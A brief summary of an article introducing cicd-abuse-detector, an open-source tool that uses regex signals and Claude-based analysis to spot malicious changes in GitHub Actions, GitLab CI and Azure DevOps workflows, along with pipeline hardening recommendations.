The article introduces cicd-abuse-detector, an open-source tool designed to protect CI/CD pipelines across GitHub Actions, GitLab CI, and Azure DevOps. By combining 50+ regex signals with LLM analysis via Claude, the tool identifies malicious patterns in workflow changes, such as credential exfiltration, privileged trigger exploitation, and environment injection. It highlights the shift in adversary tactics toward targeting the automation layers that govern software deployment.
The research validates the detector against real-world campaigns and offensive toolkits like Nord Stream and Gato-X. Beyond detection, the authors provide critical hardening recommendations, including SHA-pinning actions, scoping secrets to specific steps, and setting explicit workflow permissions. The goal is to provide a queryable, cross-platform defense mechanism that integrates with Elasticsearch for long-term threat monitoring.
Top comments (0)